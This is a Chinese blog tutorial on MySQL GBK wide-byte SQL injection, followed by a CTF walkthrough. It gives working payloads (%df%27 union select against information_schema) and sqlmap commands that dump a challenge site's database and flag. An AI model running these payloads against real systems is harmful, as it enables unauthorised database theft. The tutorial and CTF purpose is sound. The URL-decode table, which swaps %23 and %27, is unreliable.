mysql 宽字符注入_sql注入 宽字节注入

最新推荐文章于 2023-02-13 12:30:00 发布
最新推荐文章于 2023-02-13 12:30:00 发布
阅读量209 收藏 1
点赞数 1
文章标签: mysql 宽字符注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39929377/article/details/113439693
版权

宽字节注入

宽字节注入是利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(ascii码要大于128,才到汉字的范围),

而当我们输入有单引号时会自动加入\进行转义而变为\’(在PHP配置文件中magic_quotes_gpc=On的情况下或者使用addslashes函数,icov函数,mysql_real_escape_string函数、mysql_escape_string函数等,

提交的参数中如果带有单引号’,就会被自动转义\’,使得多数注入攻击无效),

由于宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,将后面的一个字节与前一个大于128的ascii码进行组合成为一个完整的字符

(mysql判断一个字符是不是汉字,首先两个字符时一个汉字,另外根据gbk编码,第一个字节ascii码大于128,基本上就可以了),

此时’前的\就被吃了,我们就可以使用’了,利用这个特性从而可实施SQL注入的利用。)

GBK 占用两字节

ASCII占用一字节

PHP中编码为GBK,函数执行添加的是ASCII编码,MYSQL默认字符集是GBK等宽字节字符集。

%DF:

输入%df和函数执行添加的%5C,被合并成%df%5C。由于GBK是两字节,这个%df%5C被MYSQL识别为GBK。导致本应的%df\变成%df%5C。%df%5C在GBK编码中没有对应,所以被当成无效字符  。

%df%5c  ----->  運

%DF’

会被PHP当中的addslashes函数转义为“  %DF\'” ,“\”则是URL里的“%5C”,那么也就是说,

“%DF'”会被转成“%DF%5C%27”倘若网站的字符集是GBK,MYSQL使用的编码也是GBK的话,就会认为“%DF%5C%27”是一个宽字符。也就是“縗’”

%df%5c%27  ----->  縗 '

例如:http://www.xxx.com/login.php?user=%df’ or 1=1 limit 1,1%23&pass=

其对应的sql就是:

select * fromcms_user where username = ‘運’ or 1=1 limit 1,1#’ and password=”

所以%df和后面的\也就是%5c变成了一个汉字“運”, 而 ’逃逸了出来

URLdecode解码

%23: ’

%27: #

%5c: \

%df \    ------>運

%df%5c%27  ----->  縗 '

例题:

先尝试单引号?id=1’   发现页面输出的引号被转义了,在前面加了一个 \ 符号

尝试 如果构造 \ \ 那么后面的引号也就可以发挥作用了

c83f9c044b00c376a5cf5156b4cec581.png

8583b83ffcbc8d8eca9e1ba76f4af55e.png

构造:?id=1%df%27

报错

b5f2512463fa2ff9f879989846a2897c.png

再构造:?id=1%df%df%23

查询又恢复正常了,因为%df%df 双字节构成了一个汉字,而%df%23又不成汉字所以得知此题存在宽字节注入

85af02f06029fd59506157f5f5ab4f52.png

开始爆数据库:

?id=1%df%27 order by 2#

列数得知 2列。

爆库:

?id=-1%df%27 union select 1,database()%23

数据库:sae-chinalover

爆列表:

?id=-1%df%27 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572%23

爆出这些表:

ctf,ctf2,ctf3,ctf4,gbksqli,news

爆字段:

?id=-1%df%27 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23

字段:id flag

查询关键字:

?id=-1%df%27 union select 1,flag from ctf4%23

利用Sqlmap:

sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27"

跑出库  :   sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27"  --dbs

4ef86e676b69e15683785bea2e7ed04d.png

爆表:   sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" -D sae-chinalover   --tables

18ee3d72332590855134873dcaea3787.png

爆字段  sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" -D sae-chinalover -T ctf  --columns

639b455d525acc2e913380bb1e253047.png

跑出flag:sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" -D sae-chinalover  -C flag --dump

weixin_39929377
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宽字节注入
newlife1441的博客
08-09 664
在学习宽字节注入前我们需要先了解一下mysql中常常用来转义的函数有以下几种:addslashes、mysql_real_escape_string、mysql_escape_string以及后面在高版本被去除的magic_quote_gpc,常用的是addslashes,它的定义是返回在预定义字符之前添加反斜杠的字符串,预定义字符是:单引号(')、双引号(")、反斜杠(\)、NULLPHP addslashes() 函数📔。...
sqllabs less-32~37字节出入
m0_51607644的博客
02-02 169
写在前边 %df 吃掉 \ 在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27。GB2312、GBK等这些都是常说的字节,实际上只有两字节。字节带来的安全问题主要是吃ASC
mysql报错注入_mysql注入可报错时爆表名、字段名、库名
weixin_33274728的博客
01-13 678
已知某个地方有注入,waf拦截了information_schema、columns、tables、database、schema等关键字或函数,我们如何去获取当前表名,字段名和库名呢?字段名常见的做法有利用union搭配别名子查询,在不知道字段的时候进行注入。例如:select*fromtestwhereid=1unionselect(selecte.4from(sele...
mysql中的字符注入_深入理解Mysql字符注入
weixin_32452127的博客
02-10 248
之前记录过一篇 写的不够详细概念字节是相对于ascII这样单字节而言的;像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的字节,实际上只有两字节GBK是一种多字符的编码,通常来说,一个gbk编码汉字,占用2个字节。一个utf-8编码的汉字,占用3个字节原理mysql在使用GBK编码会认为两个字符为一个汉字,只要前一个字符的ascii码>128就是汉字的编...
宽字节注入入门详解
爱党人士
05-11 4406
原理: GBK 占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等字节字符集。 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等), 单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C , 那么现在 %df\’ =%df%5c%27, 如果程序的默认...
mysql 字符注入_5. 字符注入详解与实战
weixin_39955351的博客
01-19 153
宽字节注入源于程序员设置MySQL连接时的错误配置,如下:set character_set_client=gbk这样的配置会引发编码转换从而导致绕过某些防护实现注入漏洞。具体分析一下原理:正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的',就会被转义为\';若存在宽字节注入,输入%df%27时,经过单引号的转义变成了%df%5c%27,之后再数...
第十九节 字节SQL注入-01
最新发布
09-15
字节SQL注入是一种特殊类型的SQL注入攻击,主要针对使用字节字符集(如GBK、UTF-16等)的数据库管理系统。字节SQL注入攻击的关键在于exploit字节字符集的特性来 bypass 数据库的安全机制。 字节字符集 ...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
但是,addslashes函数并不能完全防止SQL注入,因为它不能处理多字节字符。例如,可以使用0xbf27来代替单引号,而addslashes只是将0xbf27修改为0xbf5c27,成为一个有效的多字节字符,其中的0xbf5c仍会被看作是单引号...
PHP与SQL注入攻击[二]
10-30
对于**多字节语言**,如中文、日语等,由于其字符集的ASCII范围可能与二进制数据范围重叠,也可能引发安全问题。在这种情况下,需要使用特定的函数(如PHP的`mbstring`扩展)进行编码,以避免在查询中引发错误。然而...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
超级SQL注入工具使用说明书V1.1 20190303.docx
05-03
这款工具不仅支持常见的 Blind 注入(包括Bool型盲注和基于延迟的盲注)、Error注入以及Union注入,还广泛适用于多种数据库系统,如Access、MySQL、SQLServer、Oracle、PostgreSQL、DB2、SQLite以及Informix等。...
南邮CTF injection-3 宽字节注入
include_heqile的博客
03-22 3044
从昨天晚上开始做的,结果踩了一个坑,干到了凌晨1点,电脑都自动关机了,也没做出来,电脑关机之后,又用手机查了一下,知道了应该用表名的16进制形式来进行爆表,然后到今天上午才做完,还是上计组的时候用手机的火狐做的,手机做是真的难受宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码表名库名的十六进制形式: 字符形式的表名: ctf表示成十...
渗透测试-SQL注入宽字节注入
lza20001103的博客
04-20 8702
渗透测试-SQL注入宽字节注入
深入浅出带你学习宽字节注入
bluemoon_0的博客
02-13 742
深入浅出带你学习宽字节注入
[Pikachu靶场实战系列] SQL注入宽字节注入
00勇士王子的博客
08-01 3498
宽字节注入原理 在数据库中使用了字符集(GBK,GB2312等),除了英文都是一个字符占两字节; MySQL在使用GBK编码的时候,会认为两个字符为一个汉字(ascii>128才能达到汉字范围); 在PHP中使用addslashes函数的时候,会对单引号%27进行转义,在前边加一个反斜杠”\”,变成%5c%27; 可以在前边添加%df,形成%df%5c%27,而数据进入数据库中时前边的%df%5c两字节会被当成一个汉字; %5c被吃掉了,单引号由此逃逸可以用来闭合语句。 使用PHP函数iconv(‘
mysql字符注入
一个码农的笔记
10-14 2446
先补充一点背景: 大 家都知道PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候,单引号(')会被转义成\'。比如字 符%bf在满足上述条件的情况下会变成%bf\'。其中反斜杠(\)的十六进制编码是%5C,单引号(')的十六进制编码是%27,那么就可以得出%bf \'=%bf%5c%27。如果程序的默认字符集是GBK等字节字符集,则MySQL会认为
mysql宽字节注入_(宽字节注入) 手注+sqlmap
weixin_29726381的博客
02-27 230
进入题目后先简单尝试一下。 很明显的宽字节注入宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码.手工注入1、判断列数:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23http://chinalover.sinaapp.com/SQL-GBK/index.php...
字节SQL注入基础与实战解析
"字节SQL注入是Web安全领域中一种常见的攻击手段,主要涉及到字符编码与数据库处理方式的交互问题。在本节中,我们将深入探讨宽字节注入的基础概念、代码分析、实际演示以及如何使用Sqlmap进行安全测试。 字节...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值